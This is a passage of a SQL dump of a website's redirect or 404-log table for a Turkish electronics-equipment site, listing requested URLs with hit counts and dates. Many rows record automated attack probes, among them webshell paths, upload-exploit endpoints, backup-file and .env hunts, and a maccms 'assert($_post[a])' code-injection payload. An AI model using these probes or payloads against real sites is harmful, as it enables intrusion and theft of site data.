00:00:00',301),(32083,'https://www.3s-technologies.com.tr/tr/apple-touch-icon-120x120.png',NULL,'','',2,0,'2023-03-10 16:04:10','0000-00-00 00:00:00',301),(32084,'https://www.3s-technologies.com.tr/tr/apple-touch-icon-precomposed.png',NULL,'','',9,0,'2023-03-10 16:04:11','0000-00-00 00:00:00',301),(32085,'https://www.3s-technologies.com.tr/tr/apple-touch-icon.png',NULL,'','',9,0,'2023-03-10 16:04:11','0000-00-00 00:00:00',301),(32086,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/templates/beez5/images/vm-preloader.gif',NULL,'http://proneo-led.com/3s-technologies.com.tr/joomla/templates/beez5/css/vmsite-ltr.css?vmver=1ca80efd','',1,0,'2023-03-11 14:30:33','0000-00-00 00:00:00',301),(32087,'http://3s-technologies.com.tr/en/wp-content/plugins/topxoh/oh.php',NULL,'www.google.com','',1,0,'2023-03-14 01:51:15','0000-00-00 00:00:00',301),(32088,'https://3s-technologies.com.tr/en/wp-content/plugins/w0rdpr3ssnew/wp-login.php',NULL,'www.google.com','',1,0,'2023-03-14 01:51:32','0000-00-00 00:00:00',301),(32089,'http://3s-technologies.com.tr/en/wp-content/plugins/topxoh/wdr.php',NULL,'www.google.com','',5,0,'2023-03-14 01:51:52','0000-00-00 00:00:00',301),(32090,'https://3s-technologies.com.tr/en/wp-content/updates.php',NULL,'www.google.com','',1,0,'2023-03-14 01:52:15','0000-00-00 00:00:00',301),(32091,'http://www.3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/turkish-content/100-panasonic-overview',NULL,'','',5,0,'2023-03-14 04:52:33','0000-00-00 00:00:00',301),(32092,'https://3s-technologies.com.tr/class-matchesmapregex-error-comment.php',NULL,'','',3,0,'2023-03-15 01:54:29','0000-00-00 00:00:00',301),(32093,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-03-17 08:54:01','0000-00-00 00:00:00',301),(32094,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/ls60v-detail',NULL,'','',3,0,'2023-03-18 06:50:26','0000-00-00 00:00:00',301),(32095,'http://www.3s-technologies.com.tr/en/wp-content/updates.php',NULL,'www.google.com','',3,0,'2023-03-18 23:23:03','0000-00-00 00:00:00',301),(32096,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/by,category_name?language=tr-tr&keyword=',NULL,'','',2,0,'2023-03-18 23:53:15','0000-00-00 00:00:00',301),(32097,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/cs40-detail/askquestion?tmpl=component',NULL,'','',1,0,'2023-03-19 01:56:56','0000-00-00 00:00:00',301),(32098,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-03-19 02:40:34','0000-00-00 00:00:00',301),(32099,'http://3s-technologies.com.tr/tr//api/index.php/v1/config/application?public=true',NULL,'','',1,0,'2023-03-19 16:43:52','0000-00-00 00:00:00',301),(32100,'http://3s-technologies.com.tr/tr/wp-content/themes/houzez/style.css',NULL,'','',2,0,'2023-03-20 11:26:40','0000-00-00 00:00:00',301),(32101,'http://www.3s-technologies.com.tr/tr/api/index.php/v1/config/application?public=true',NULL,'','',3,0,'2023-03-21 18:55:29','0000-00-00 00:00:00',301),(32102,'http://www.3s-technologies.com.tr/tr/wp-content',NULL,'','',15,0,'2023-03-22 04:01:49','0000-00-00 00:00:00',301),(32103,'http://3s-technologies.com.tr//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',1,0,'2023-03-22 18:42:54','0000-00-00 00:00:00',301),(32104,'http://3s-technologies.com.tr//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=vuln.php',NULL,'','',1,0,'2023-03-22 18:42:55','0000-00-00 00:00:00',301),(32105,'http://3s-technologies.com.tr//components/com_oziogallery/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',1,0,'2023-03-22 18:42:59','0000-00-00 00:00:00',301),(32106,'http://3s-technologies.com.tr//administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=vuln.php',NULL,'','',1,0,'2023-03-22 18:43:01','0000-00-00 00:00:00',301),(32107,'http://3s-technologies.com.tr//administrator/components/com_simplephotogallery/lib/uploadfile.php',NULL,'','',1,0,'2023-03-22 18:43:02','0000-00-00 00:00:00',301),(32108,'http://3s-technologies.com.tr//modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"',NULL,'','',1,0,'2023-03-22 18:43:04','0000-00-00 00:00:00',301),(32109,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce-payments/dist/blocks-checkout.css',NULL,'','',6,0,'2023-03-26 00:06:53','0000-00-00 00:00:00',301),(32110,'https://www.3s-technologies.com.tr/tr/xxxss',NULL,'','',2,0,'2023-03-26 03:38:41','0000-00-00 00:00:00',301),(32111,'https://3s-technologies.com.tr/tr/xxxss',NULL,'','',2,0,'2023-03-26 03:38:42','0000-00-00 00:00:00',301),(32112,'http://3s-technologies.com.tr:80/tr/backup.sql',NULL,'http://3s-technologies.com.tr:80/backup.sql','',1,0,'2023-03-26 16:27:59','0000-00-00 00:00:00',301),(32113,'http://3s-technologies.com.tr:80/tr/dump.sql',NULL,'http://3s-technologies.com.tr:80/dump.sql','',1,0,'2023-03-26 23:41:49','0000-00-00 00:00:00',301),(32114,'https://3s-technologies.com.tr:443/tr/dump.sql',NULL,'https://3s-technologies.com.tr:443/dump.sql','',1,0,'2023-03-27 03:57:13','0000-00-00 00:00:00',301),(32115,'http://3s-technologies.com.tr:80/tr/test.sql',NULL,'http://3s-technologies.com.tr:80/test.sql','',1,0,'2023-03-27 06:58:18','0000-00-00 00:00:00',301),(32116,'http://www.3s-technologies.com.tr/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"',NULL,'','',1,0,'2023-03-27 08:25:28','0000-00-00 00:00:00',301),(32117,'http://www.3s-technologies.com.tr/tr/modules/megamenu/uploadify/up.php',NULL,'','',1,0,'2023-03-27 08:25:29','0000-00-00 00:00:00',301),(32118,'http://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/up.php',NULL,'','',1,0,'2023-03-27 08:25:31','0000-00-00 00:00:00',301),(32119,'https://3s-technologies.com.tr:443/tr/mysqldump.sql',NULL,'https://3s-technologies.com.tr:443/mysqldump.sql','',1,0,'2023-03-27 18:32:20','0000-00-00 00:00:00',301),(32120,'http://3s-technologies.com.tr:80/tr/mysql.sql',NULL,'http://3s-technologies.com.tr:80/mysql.sql','',1,0,'2023-03-27 21:34:44','0000-00-00 00:00:00',301),(32121,'http://3s-technologies.com.tr:80/tr/www.sql',NULL,'http://3s-technologies.com.tr:80/www.sql','',1,0,'2023-03-28 12:12:42','0000-00-00 00:00:00',301),(32122,'https://3s-technologies.com.tr:443/tr/www.sql',NULL,'https://3s-technologies.com.tr:443/www.sql','',1,0,'2023-03-28 16:31:20','0000-00-00 00:00:00',301),(32123,'http://3s-technologies.com.tr/tr/panel',NULL,'','',4,0,'2023-03-28 22:41:15','0000-00-00 00:00:00',301),(32124,'http://3s-technologies.com.tr/tr/yonetim',NULL,'','',2,0,'2023-03-28 22:41:16','0000-00-00 00:00:00',301),(32125,'http://3s-technologies.com.tr/tr/yonetici',NULL,'','',1,0,'2023-03-28 22:41:16','0000-00-00 00:00:00',301),(32126,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-03-29 12:49:59','0000-00-00 00:00:00',301),(32127,'https://www.3s-technologies.com.tr/tr/data/admin/allowurl.txt',NULL,'','',2,0,'2023-03-30 18:56:40','0000-00-00 00:00:00',301),(32128,'https://3s-technologies.com.tr/tr/data/admin/allowurl.txt',NULL,'','',2,0,'2023-03-30 18:56:42','0000-00-00 00:00:00',301),(32129,'http://3s-technologies.com.tr/tr/.x1-unix',NULL,'','',1,0,'2023-03-31 10:29:01','0000-00-00 00:00:00',301),(32130,'http://3s-technologies.com.tr/tr/cgi-bin',NULL,'','',42,0,'2023-03-31 10:29:06','0000-00-00 00:00:00',301),(32131,'http://3s-technologies.com.tr/tr/.qidb',NULL,'','',2,0,'2023-03-31 10:29:10','0000-00-00 00:00:00',301),(32132,'http://3s-technologies.com.tr/tr/.well-knownold',NULL,'','',53,0,'2023-03-31 10:29:13','0000-00-00 00:00:00',301),(32133,'http://3s-technologies.com.tr/tr/admin/uploads',NULL,'','',82,0,'2023-03-31 10:29:25','0000-00-00 00:00:00',301),(32134,'http://3s-technologies.com.tr/tr/userfiles',NULL,'','',14,0,'2023-03-31 10:29:29','0000-00-00 00:00:00',301),(32135,'http://3s-technologies.com.tr/tr/usersfiles',NULL,'','',21,0,'2023-03-31 10:29:33','0000-00-00 00:00:00',301),(32136,'http://3s-technologies.com.tr/tr/upload/image',NULL,'','',35,0,'2023-03-31 10:29:47','0000-00-00 00:00:00',301),(32137,'http://3s-technologies.com.tr/tr/assets/images',NULL,'','',46,0,'2023-03-31 10:29:51','0000-00-00 00:00:00',301),(32138,'http://3s-technologies.com.tr/tr/sites/default/files',NULL,'','',42,0,'2023-03-31 10:29:55','0000-00-00 00:00:00',301),(32139,'http://3s-technologies.com.tr/tr/admin/controller/extension/extension',NULL,'','',84,0,'2023-03-31 10:29:59','0000-00-00 00:00:00',301),(32140,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements',NULL,'','',39,0,'2023-03-31 10:30:07','0000-00-00 00:00:00',301),(32141,'http://3s-technologies.com.tr/tr/up',NULL,'','',14,0,'2023-03-31 10:30:11','0000-00-00 00:00:00',301),(32142,'http://3s-technologies.com.tr/tr/bootstrap',NULL,'','',1,0,'2023-03-31 10:30:21','0000-00-00 00:00:00',301),(32143,'http://3s-technologies.com.tr/tr/config',NULL,'','',2,0,'2023-03-31 10:30:25','0000-00-00 00:00:00',301),(32144,'http://3s-technologies.com.tr/tr/css',NULL,'','',6,0,'2023-03-31 10:30:37','0000-00-00 00:00:00',301),(32145,'http://3s-technologies.com.tr/tr/database',NULL,'','',2,0,'2023-03-31 10:30:41','0000-00-00 00:00:00',301),(32146,'http://3s-technologies.com.tr/tr/fonts',NULL,'','',1,0,'2023-03-31 10:30:45','0000-00-00 00:00:00',301),(32147,'http://3s-technologies.com.tr/tr/public',NULL,'','',24,0,'2023-03-31 10:30:51','0000-00-00 00:00:00',301),(32148,'http://3s-technologies.com.tr/tr/routes',NULL,'','',1,0,'2023-03-31 10:30:55','0000-00-00 00:00:00',301),(32149,'http://3s-technologies.com.tr/tr/tests',NULL,'','',1,0,'2023-03-31 10:31:09','0000-00-00 00:00:00',301),(32150,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util',NULL,'','',1,0,'2023-03-31 10:31:21','0000-00-00 00:00:00',301),(32151,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src',NULL,'','',1,0,'2023-03-31 10:31:26','0000-00-00 00:00:00',301),(32152,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit',NULL,'','',1,0,'2023-03-31 10:31:30','0000-00-00 00:00:00',301),(32153,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',1,0,'2023-03-31 15:46:04','0000-00-00 00:00:00',301),(32154,'https://3s-technologies.com.tr/tr/akrilik-iåÿleme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',3,0,'2023-03-31 22:11:25','0000-00-00 00:00:00',301),(32155,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor-pro/assets/css/preview.css',NULL,'','',3,0,'2023-04-01 06:49:48','0000-00-00 00:00:00',301),(32156,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-41-42-detail/askquestion?tmpl=component',NULL,'','',1,0,'2023-04-01 14:58:33','0000-00-00 00:00:00',301),(32157,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/spartan-8s-8d-44-detail/askquestion?tmpl=component',NULL,'','',2,0,'2023-04-03 01:15:47','0000-00-00 00:00:00',301),(32158,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/ls60v-detail?tmpl=component&print=1',NULL,'','',1,0,'2023-04-03 02:10:32','0000-00-00 00:00:00',301),(32159,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/smd-fä±rä±n/by,product_name?language=tr-tr&keyword=',NULL,'','',2,0,'2023-04-03 22:36:33','0000-00-00 00:00:00',301),(32160,'http://3s-technologies.com.tr/tr/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'','',2,0,'2023-04-04 12:01:14','0000-00-00 00:00:00',301),(32161,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/db.php?u',NULL,'','',5,0,'2023-04-04 12:01:15','0000-00-00 00:00:00',301),(32162,'http://3s-technologies.com.tr/tr/wp-content/themes/seoplugins/db.php?u',NULL,'','',1,0,'2023-04-04 12:01:16','0000-00-00 00:00:00',301),(32163,'http://3s-technologies.com.tr/tr/wp-content/plugins/gatewayapi/inc/a57bze8931.php',NULL,'','',1,0,'2023-04-04 12:01:19','0000-00-00 00:00:00',301),(32164,'http://3s-technologies.com.tr/tr/abruzi.php4',NULL,'','',1,0,'2023-04-04 12:01:20','0000-00-00 00:00:00',301),(32165,'http://3s-technologies.com.tr/tr/wp-content/king.php',NULL,'','',1,0,'2023-04-04 12:01:20','0000-00-00 00:00:00',301),(32166,'http://3s-technologies.com.tr/tr/wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php',NULL,'','',1,0,'2023-04-04 12:01:20','0000-00-00 00:00:00',301),(32167,'http://3s-technologies.com.tr/tr/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php',NULL,'','',1,0,'2023-04-04 12:01:21','0000-00-00 00:00:00',301),(32168,'http://3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php',NULL,'','',1,0,'2023-04-04 12:01:21','0000-00-00 00:00:00',301),(32169,'http://3s-technologies.com.tr/tr/wp-content/plugins/apikey/a57bze8931.php',NULL,'','',1,0,'2023-04-04 12:01:22','0000-00-00 00:00:00',301),(32170,'http://3s-technologies.com.tr/tr/wp-content/shell20211028.php',NULL,'','',28,0,'2023-04-04 12:01:23','0000-00-00 00:00:00',301),(32171,'http://3s-technologies.com.tr/tr/shell20211028.php',NULL,'','',111,0,'2023-04-04 12:01:23','0000-00-00 00:00:00',301),(32172,'http://3s-technologies.com.tr/tr/wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php',NULL,'','',1,0,'2023-04-04 12:01:24','0000-00-00 00:00:00',301),(32173,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-engine-module/a57bze8931.php',NULL,'','',1,0,'2023-04-04 12:01:25','0000-00-00 00:00:00',301),(32174,'http://3s-technologies.com.tr/tr/wp-admin/shell20211028.php',NULL,'','',9,0,'2023-04-04 12:01:26','0000-00-00 00:00:00',301),(32175,'http://3s-technologies.com.tr/tr/life360.php',NULL,'','',1,0,'2023-04-04 12:01:28','0000-00-00 00:00:00',301),(32176,'http://3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/a57bze8931.php',NULL,'','',1,0,'2023-04-04 12:01:30','0000-00-00 00:00:00',301),(32177,'http://3s-technologies.com.tr/tr/wp-content/plugins/ioptimizations/a57bze8931.php',NULL,'','',1,0,'2023-04-04 12:01:31','0000-00-00 00:00:00',301),(32178,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/ess-310-detail',NULL,'','',1,0,'2023-04-04 20:06:40','0000-00-00 00:00:00',301),(32179,'http://mail.3s-technologies.com.tr/en/wp-content/themes/seotheme/db.php?u',NULL,'www.google.com','',1,0,'2023-04-05 17:34:29','0000-00-00 00:00:00',301),(32180,'https://mail.3s-technologies.com.tr/en/wp-content/themes/seotheme/db.php?u',NULL,'www.google.com','',1,0,'2023-04-05 17:34:34','0000-00-00 00:00:00',301),(32181,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-05 20:51:05','0000-00-00 00:00:00',301),(32182,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-06 09:02:53','0000-00-00 00:00:00',301),(32183,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-06 13:22:31','0000-00-00 00:00:00',301),(32184,'http://www.3s-technologies.com.tr/fckeditor/editor/filemanager/connectors/asp/connector.asp?command=fileupload&type=file&currentfolder=/',NULL,'http://www.3s-technologies.com.tr/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','',1,0,'2023-04-07 05:18:34','0000-00-00 00:00:00',301),(32185,'http://3s-technologies.com.tr/admin_aspcms/_system/aspcms_sitesetting.asp',NULL,'http://3s-technologies.com.tr/admin_aspcms/_system/AspCms_SiteSetting.asp','',2,0,'2023-04-07 05:18:35','0000-00-00 00:00:00',301),(32186,'http://www.3s-technologies.com.tr/admin_aspcms/_system/aspcms_sitesetting.asp',NULL,'http://www.3s-technologies.com.tr/admin_aspcms/_system/AspCms_SiteSetting.asp','',2,0,'2023-04-07 05:18:35','0000-00-00 00:00:00',301),(32187,'http://www.3s-technologies.com.tr/utility/convert/index.php?a=config&source=d7.2_x2.0',NULL,'http://www.3s-technologies.com.tr/utility/convert/index.php?a=config&source=d7.2_x2.0','',1,0,'2023-04-07 05:18:38','0000-00-00 00:00:00',301),(32188,'http://3s-technologies.com.tr/utility/convert/index.php?a=config&source=d7.2_x2.0',NULL,'http://3s-technologies.com.tr/utility/convert/index.php?a=config&source=d7.2_x2.0','',1,0,'2023-04-07 05:18:38','0000-00-00 00:00:00',301),(32189,'http://www.3s-technologies.com.tr/utility/convert/data/config.inc.php',NULL,'http://www.3s-technologies.com.tr/utility/convert/data/config.inc.php','',1,0,'2023-04-07 05:18:39','0000-00-00 00:00:00',301),(32190,'http://3s-technologies.com.tr/utility/convert/data/config.inc.php',NULL,'http://3s-technologies.com.tr/utility/convert/data/config.inc.php','',1,0,'2023-04-07 05:18:39','0000-00-00 00:00:00',301),(32191,'http://www.3s-technologies.com.tr/uploads/dede/sys_verifies.php?action=down',NULL,'http://www.3s-technologies.com.tr/uploads/dede/sys_verifies.php?action=down','',1,0,'2023-04-07 05:18:41','0000-00-00 00:00:00',301),(32192,'http://3s-technologies.com.tr/uploads/dede/sys_verifies.php?action=down',NULL,'http://3s-technologies.com.tr/uploads/dede/sys_verifies.php?action=down','',1,0,'2023-04-07 05:18:41','0000-00-00 00:00:00',301),(32193,'http://www.3s-technologies.com.tr/fdgq.php',NULL,'http://www.3s-technologies.com.tr/fdgq.php','',1,0,'2023-04-07 05:18:43','0000-00-00 00:00:00',301),(32194,'http://3s-technologies.com.tr/fdgq.php',NULL,'http://3s-technologies.com.tr/fdgq.php','',1,0,'2023-04-07 05:18:43','0000-00-00 00:00:00',301),(32195,'http://3s-technologies.com.tr/uwrbe.php',NULL,'http://3s-technologies.com.tr/uwrbe.php','',1,0,'2023-04-07 05:18:44','0000-00-00 00:00:00',301),(32196,'http://www.3s-technologies.com.tr/drtma.php',NULL,'http://www.3s-technologies.com.tr/drtma.php','',1,0,'2023-04-07 05:18:44','0000-00-00 00:00:00',301),(32197,'http://3s-technologies.com.tr/ysyqq.php',NULL,'http://3s-technologies.com.tr/ysyqq.php','',1,0,'2023-04-07 05:18:46','0000-00-00 00:00:00',301),(32198,'http://www.3s-technologies.com.tr/ysyqq.php',NULL,'http://www.3s-technologies.com.tr/ysyqq.php','',1,0,'2023-04-07 05:18:46','0000-00-00 00:00:00',301),(32199,'http://3s-technologies.com.tr/pqrzp.php',NULL,'http://3s-technologies.com.tr/pqrzp.php','',1,0,'2023-04-07 05:18:47','0000-00-00 00:00:00',301),(32200,'http://www.3s-technologies.com.tr/bouxp.php',NULL,'http://www.3s-technologies.com.tr/bouxp.php','',1,0,'2023-04-07 05:18:47','0000-00-00 00:00:00',301),(32201,'http://www.3s-technologies.com.tr/e/doinfo/ecms.php',NULL,'http://www.3s-technologies.com.tr/e/DoInfo/ecms.php','',1,0,'2023-04-07 05:18:50','0000-00-00 00:00:00',301),(32202,'http://3s-technologies.com.tr/e/doinfo/ecms.php',NULL,'http://3s-technologies.com.tr/e/DoInfo/ecms.php','',1,0,'2023-04-07 05:18:51','0000-00-00 00:00:00',301),(32203,'http://www.3s-technologies.com.tr/search.php',NULL,'http://www.3s-technologies.com.tr/search.php','',5,0,'2023-04-07 05:18:52','0000-00-00 00:00:00',301),(32204,'http://www.3s-technologies.com.tr/index.php?m=vod-search',NULL,'http://www.3s-technologies.com.tr/index.PHP?m=vod-search','',1,0,'2023-04-07 05:18:55','0000-00-00 00:00:00',301),(32205,'http://www.3s-technologies.com.tr/c.php',NULL,'http://www.3s-technologies.com.tr/c.php','',1,0,'2023-04-07 05:18:56','0000-00-00 00:00:00',301),(32206,'http://3s-technologies.com.tr/c.php',NULL,'http://3s-technologies.com.tr/c.php','',1,0,'2023-04-07 05:18:56','0000-00-00 00:00:00',301),(32207,'http://3s-technologies.com.tr/maccms/index.php?m=vod-search={if-a:assert($_post[a])}{endif-a}',NULL,'http://3s-technologies.com.tr/maccms/index.php?m=vod-search={if-A:assert($_POST[a])}{endif-A}','',1,0,'2023-04-07 05:18:57','0000-00-00 00:00:00',301),(32208,'http://www.3s-technologies.com.tr/maccms/index.php?m=vod-search={if-a:assert($_post[a])}{endif-a}',NULL,'http://www.3s-technologies.com.tr/maccms/index.php?m=vod-search={if-A:assert($_POST[a])}{endif-A}','',1,0,'2023-04-07 05:18:57','0000-00-00 00:00:00',301),(32209,'http://www.3s-technologies.com.tr/mysql.bak.php',NULL,'http://www.3s-technologies.com.tr/mysql.bak.php','',1,0,'2023-04-07 05:19:03','0000-00-00 00:00:00',301),(32210,'http://3s-technologies.com.tr/mysql.bak.php',NULL,'http://3s-technologies.com.tr/mysql.bak.php','',1,0,'2023-04-07 05:19:03','0000-00-00 00:00:00',301),(32211,'https://www.3s-technologies.com.tr/tr/%c3%bcr%c3%bcnler/smd-f%c4%b1r%c4%b1n',NULL,'','',1,0,'2023-04-07 13:22:51','0000-00-00 00:00:00',301),(32212,'https://www.3s-technologies.com.tr/tr/%c3%bcr%c3%bcnler/konveyorler',NULL,'','',1,0,'2023-04-07 13:22:57','0000-00-00 00:00:00',301),(32213,'https://www.3s-technologies.com.tr/tr/wood-processing-ah%c5%9fap-i%c5%9fleme',NULL,'','',1,0,'2023-04-07 13:23:03','0000-00-00 00:00:00',301),(32214,'https://www.3s-technologies.com.tr/tr/akrilik-i%c5%9fleme-acrylic-processing',NULL,'','',1,0,'2023-04-07 13:23:05','0000-00-00 00:00:00',301),(32215,'https://www.3s-technologies.com.tr/tr/aluminyum-i%c5%9fleme-aluminum-processing',NULL,'','',1,0,'2023-04-07 13:23:07','0000-00-00 00:00:00',301),(32216,'https://3s-technologies.com.tr/administrator/administrator.php',NULL,'','',4,0,'2023-04-07 21:42:18','0000-00-00 00:00:00',301),(32217,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-41-detail',NULL,'','',2,0,'2023-04-08 09:12:52','0000-00-00 00:00:00',301),(32218,'https://3s-technologies.com.tr/administrator/webconfig.txt.php',NULL,'','',3,0,'2023-04-08 09:55:55','0000-00-00 00:00:00',301),(32219,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-08 19:29:10','0000-00-00 00:00:00',301),(32220,'http://3s-technologies.com.tr/tr/.electrum/config',NULL,'http://3s-technologies.com.tr/.electrum/config','',8,0,'2023-04-08 19:36:50','0000-00-00 00:00:00',301),(32221,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-08 21:39:20','0000-00-00 00:00:00',301),(32222,'http://3s-technologies.com.tr/tr/joomla30/administrator/index.php',NULL,'','',1,0,'2023-04-09 10:26:53','0000-00-00 00:00:00',301),(32223,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-09 15:10:41','0000-00-00 00:00:00',301),(32224,'http://3s-technologies.com.tr/tr/assets/global/plugins/jquery_uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2023-04-10 04:55:07','0000-00-00 00:00:00',301),(32225,'http://3s-technologies.com.tr/tr/public/assets/jquery_uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2023-04-10 04:55:07','0000-00-00 00:00:00',301),(32226,'https://3s-technologies.com.tr/tr/api/index.php/v1/config/application?public=true',NULL,'','',5,0,'2023-04-11 21:13:50','0000-00-00 00:00:00',301),(32227,'http://3s-technologies.com.tr/tr/wp-content/themes/classic/rtl.css',NULL,'','',1,0,'2023-04-11 22:51:22','0000-00-00 00:00:00',301),(32228,'https://3s-technologies.com.tr/en/wp-admin/css',NULL,'binance.com','',1,0,'2023-04-13 01:00:47','0000-00-00 00:00:00',301),(32229,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-13 12:49:50','0000-00-00 00:00:00',301),(32230,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-14 15:11:34','0000-00-00 00:00:00',301),(32231,'http://3s-technologies.com.tr/tr/wp-admin/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-admin/wp-login.php','',55,0,'2023-04-15 17:27:19','0000-00-00 00:00:00',301),(32232,'http://3s-technologies.com.tr/tr/login/wp-login.php',NULL,'http://3s-technologies.com.tr/login/wp-login.php','',2,0,'2023-04-15 19:44:06','0000-00-00 00:00:00',301),(32233,'http://3s-technologies.com.tr/tr/public/plugins/plupload/examples/upload.php',NULL,'','',3,0,'2023-04-16 09:18:50','0000-00-00 00:00:00',301),(32234,'https://3s-technologies.com.tr/tr/autodiscover/autodiscover.json?@test.com/owa/?&email=autodiscover/autodiscover.json?@test.com',NULL,'','',1,0,'2023-04-18 00:28:07','0000-00-00 00:00:00',301),(32235,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-19 10:34:23','0000-00-00 00:00:00',301),(32236,'http://3s-technologies.com.tr/en/wp-content/plugins/elementor-pro/changelog.txt',NULL,'www.google.com','',2,0,'2023-04-19 18:37:51','0000-00-00 00:00:00',301),(32237,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce/readme.txt',NULL,'www.google.com','',1,0,'2023-04-19 18:38:02','0000-00-00 00:00:00',301),(32238,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce-payments/readme.txt',NULL,'','',3,0,'2023-04-19 23:27:09','0000-00-00 00:00:00',301),(32239,'http://3s-technologies.com.tr/en/wp-content/plugins/js-support-ticket/readme.txt',NULL,'','',3,0,'2023-04-19 23:27:11','0000-00-00 00:00:00',301),(32240,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-20 02:39:30','0000-00-00 00:00:00',301),(32241,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/spartan-8s-8d-44-detail?tmpl=component&print=1',NULL,'','',2,0,'2023-04-20 05:14:45','0000-00-00 00:00:00',301),(32242,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-22 04:09:09','0000-00-00 00:00:00',301),(32243,'https://www.3s-technologies.com.tr/en/aluminyum-iåÿleme-aluminum-processing',NULL,'','',4,0,'2023-04-22 08:59:41','0000-00-00 00:00:00',301),(32244,'https://www.3s-technologies.com.tr/tr/.env',NULL,'','',38,0,'2023-04-22 13:09:06','0000-00-00 00:00:00',301),(32245,'https://3s-technologies.com.tr/tr/cart',NULL,'','',8,0,'2023-04-22 16:14:28','0000-00-00 00:00:00',301),(32246,'http://3s-technologies.com.tr/tr/cart',NULL,'','',1,0,'2023-04-22 16:14:33','0000-00-00 00:00:00',301),(32247,'https://www.3s-technologies.com.tr/tr/cart',NULL,'','',1,0,'2023-04-22 16:14:37','0000-00-00 00:00:00',301),(32248,'https://3s-technologies.com.tr/tr/_profiler/phpinfo',NULL,'','',17,0,'2023-04-23 06:22:43','0000-00-00 00:00:00',301),(32249,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/by,product_name/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2023-04-23 09:43:39','0000-00-00 